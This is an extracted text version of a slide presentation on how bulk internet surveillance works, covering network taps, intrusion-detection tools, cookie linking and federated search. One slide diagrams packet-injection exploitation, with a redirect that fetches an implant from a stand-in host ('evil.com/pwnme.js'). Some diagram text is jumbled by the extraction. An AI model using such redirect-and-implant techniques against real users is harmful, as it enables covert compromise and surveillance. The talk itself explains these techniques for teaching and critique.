The Golden Age of Bulk Surveillance Nicholas C Weaver About Me... - PowerPoint PPT Presentation

The Golden Age of Bulk Surveillance Nicholas C Weaver

About Me... The Golden Age of Internet Surveillance Nicholas Weaver LITE TOP SECRET//SI//REL TO USA, FVEY 2

Not NOBUS (Nobody But Us) The Golden Age of Internet Surveillance Nicholas Weaver 3 US Navy Photograph

Not About Needles In Haystacks The Golden Age of Internet Surveillance Nicholas Weaver 4 Wikimedia Photo

Not About 
 Connecting the Dots The Golden Age of Internet Surveillance Nicholas Weaver 5

Drift Nets to 
 Create Metadata The Golden Age of Internet Surveillance Nicholas Weaver HTTP Request: 
 .doc file: 
 Spotted .onion URL Author X URL: X Is an Iphone? PGP message Mojahadeen Secrets key: X key: X José Ramón García Ares for Wikipedia 6

Pulling Threads 
 To Get Results The Golden Age of Internet Surveillance Nicholas Weaver 7 Wikimedia Photo

A Thread To Pull: 
 Watching an IRC Chat The Golden Age of Internet Surveillance Nicholas Weaver OtherDude: Hey, did you see OtherDude: http://www.bbc.com/news/world-us-canada-16330396? AnonDude: hmmm... AnonDude: HAHAH, that's pretty funny! Intercept captured 12/30/2011 11:32 GMT Step 1: "Use SIGINT" (Signals Intelligence)/DNI (Digital Network Intelligence): Enables identification of AnonDude and developing a 
 "pattern of life" for his online behavior Step 2: "Use CNE" (Computer Network Exploitation): After identification, invoke "exploit by name" to take over AnonDude's computer 8

Start With Your 
 Wiretaps... The Golden Age of Internet Surveillance Nicholas Weaver 9

How They Work: Scalable Network Intrusion Detection Systems The Golden Age of Internet Surveillance Nicholas Weaver Tap Do this in OpenFlow: 
 100 Gbps installs 
 High Volume Filter Is Not BitTorrent? already done H(SIP, DIP) Load Balancer Linear Scaling: 
 10x the money... NIDS Node 10x the bandwidth! NIDS Node NIDS Node 1u gives 1-5 Gbps 10

Inside the NIDS The Golden Age of Internet Surveillance Nicholas Weaver HTTP Request URL = /fubar/ GET HT TP /fu bar/ 1.1.. Host = .... HTTP Request URL = /baz/?id=... GET HTTP /b az/?id= 1f413 1.1... ID = 1f413 Sendmail From = someguy@... 220 mail.domain.target ESMTP Sendmail... To = otherguy@... Unlike conventional NIDS you don't worry about evasion: 
 Anyone who wants to evade uses cryptography instead 11

Which NIDS To Use? The Golden Age of Internet Surveillance Nicholas Weaver • Bro Network Security Monitor (BSD licensee) • Includes a robust suite of protocol parsers • Realtime operation, invokes Bro policy scripts • Requires seeing both sides of the tra ffi c • Lockheed/Martin Vortex (GPL) • Only handles the reassembly: 
 Network tra ffi c to files, then invoke separate parser programs • Near real-time operation • Eagle GLINT by Nexa Technologies • Formerly Amesys (was part of Bull) • Commercial "Intelligence" interception package 12

Tracking People Not Machines: 
 User Identification The Golden Age of Internet Surveillance Nicholas Weaver 13

Tracking People, Not Machines: 
 Cookie Linking The Golden Age of Internet Surveillance Nicholas Weaver 14

Bulk Recording The Golden Age of Internet Surveillance Nicholas Weaver 15

Federated Search The Golden Age of Internet Surveillance Nicholas Weaver Who Viewed This Page? Who Viewed This Page? Who Viewed This Page? Who Viewed This Page? 16

Query Focused Centralized 
 Datasets The Golden Age of Internet Surveillance Nicholas Weaver Username Site: arstechnica.com Site: arstechnica.com Site: arstechnica.com Username: broidsrocks Username: broidsrocks Username: broidsrocks Cookie: 223e77... Cookie: 223e77... Cookie: 223e77... From IP: 10.271.13.1 From IP: 10.271.13.1 From IP: 10.271.13.1 Seen: 2012-12-01 07:32:24 Seen: 2012-12-01 07:32:24 Seen: 2012-12-01 07:32:24 IP Cookie 17

Use SIGINT The Golden Age of Internet Surveillance Nicholas Weaver BBC Pageview AnonDude is... AnonDude's House Double-click Ad Linked User IDs "IP Intelligence" IP Activity History (unmasked VPNs) 18

Computer Network 
 AirPwn -Goatse Exploitation HackingTeam The Golden Age of Internet Surveillance Nicholas Weaver HTTP 302 FOUND Black Market RATs location: http://www.evil.com/pwnme.js HackingTeam GET /script.js HTTP/1.1 HTTP 200 OK GET /pwnme.js HTTP/1.1 GET /script.js HTTP/1.1 GET /theimplant HTTP/1.1 FinFisher host: www.targetdomain.com ..... host: www.evil.com host: www.targetdomain.com host: www.evil.com cookie: id=iamavictim cookie: id=iamavictim Metasploit HackingTeam HTTP 200 OK .... FinFisher Here's an exploit... NSA Eagle from the EFF 
 19 Rat from OpenClipart

Put It In Action: 
 Running on the "Cylon" Network The Golden Age of Internet Surveillance Nicholas Weaver Intel NUC computer DualComm Gbps Tap $836.37 connect to http://basestar.local to access the UI 20

A Canned Demo... The Golden Age of Internet Surveillance Nicholas Weaver 21

The Golden Age of Internet Surveillance Nicholas Weaver 22

The Golden Age of Internet Surveillance Nicholas Weaver 23

The Golden Age of Internet Surveillance Nicholas Weaver 24

The Golden Age of Internet Surveillance Nicholas Weaver 25

The Golden Age of Internet Surveillance Nicholas Weaver 26

The Golden Age of Internet Surveillance Nicholas Weaver 27

The Golden Age of Internet Surveillance Nicholas Weaver 28

The Golden Age of Internet Surveillance Nicholas Weaver 29

The Golden Age of Internet Surveillance Nicholas Weaver 30

This is Hobby Stu ff ... The Golden Age of Internet Surveillance Nicholas Weaver 31 Wikipedia (Tobias Grosch)

So Who Are 
 Your Friends? The Golden Age of Internet Surveillance Nicholas Weaver 32 From amcharts.com

So What Now? 
 Go Dark The Golden Age of Internet Surveillance Nicholas Weaver 33

Because What's The Opposite Of NOBUS? The Golden Age of Internet Surveillance Nicholas Weaver • Upcoming UC Berkeley CS 194 (Practical Networking) project #2: 
 Build an NSA style surveillance suite... 34